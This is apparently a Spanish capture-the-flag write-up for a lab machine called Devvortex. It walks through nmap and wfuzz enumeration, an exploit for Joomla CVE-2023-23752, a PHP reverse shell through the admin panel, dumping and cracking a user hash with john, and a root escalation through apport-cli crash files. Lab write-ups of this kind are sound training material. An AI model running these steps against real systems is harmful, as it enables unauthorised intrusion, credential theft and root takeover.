Hacemos un escaneo con nmap y vemos que tenemos estos puertos abierto y si ademas le pasamos -sVC
vemos que hay un nombre de dominio que vamos a tener que agregar a nuestro archivo /etc/hosts
sudo nmap -sCV -p80,22 -n -Pn --min-rate 5000 10.10.11.242
vemos que hay un nombre de dominio ese es el que vamos a agregar al archivo hosts
, y usamos wfuzz para buscar subdominios y encontraremos un .dev
wfuzz -c -t 100 --hc=404,403,302 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.10.10.11.242" 10.10.11.242
Bingo tenemos un subdominio (si miramos whatweb podemos ver que esta web esta basada en Joomla
), ahora vamos a hacer Fuzzing con wfuzz y vamos a buscar subdirectorios
wfuzz -c -t 100 --hc=404,403 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://dev.devvortex.htb/FUZZ/
y encontramos un directorio administrator
vemos claramente que esta usando un joomla
por lo cual podemos ver cuales son los directorio clasicos de este gestor de contenido (https://www.cmsjunkie.com/blog/post/understanding-the-joomla-directory-structure)
si miramos el archivo readme podemos ver la versio de joomla la cual es vulnerable y si descargamos el exploit POC podemos ver lo siguiente
(https://github.com/Acceis/exploit-CVE-2023-23752)
ahora vamos a logearnos en la web
/administrator
y una vez dentro vamos a modificar un php para mandarnos una revershell
ahora nos ponemos en escucha y accedemos a la web y ya tenemos la revershell
aplicamos el Tratamiento de la tty, y si revisamos la bases de datos y las tablas llegamos a un hash del usuario logan
mysql -u lewis --password
show databases;
use joomla;
show tables;
select * from sd4fg_users
ahora les hacemos fuerza burta, pasaando el hash de logan a un archivo por separado
john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash
ahora podemos iniciar sesion en ssh
ssh logan@<ip>
vemos que tenemos permisos para ejecutar un binario con permisos de root
si vemos la version podemos ver que es vulnerable, asique vamos a explotarlo de esta forma (vamos a pasar al binario un archivo crash para que nos de la opcion de ponernos como root)
sleep 60 &
suspendemos la session
kill -SIGSEGV <PID>
la matamos
ls /var/crash/
vemos si se ha generado el crash file
sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
ejecutamos y le damos a la V para ver el reporte, y ahora como tenemosun texto muy largo vamos a ejecutar un comando aqui
y ya somos root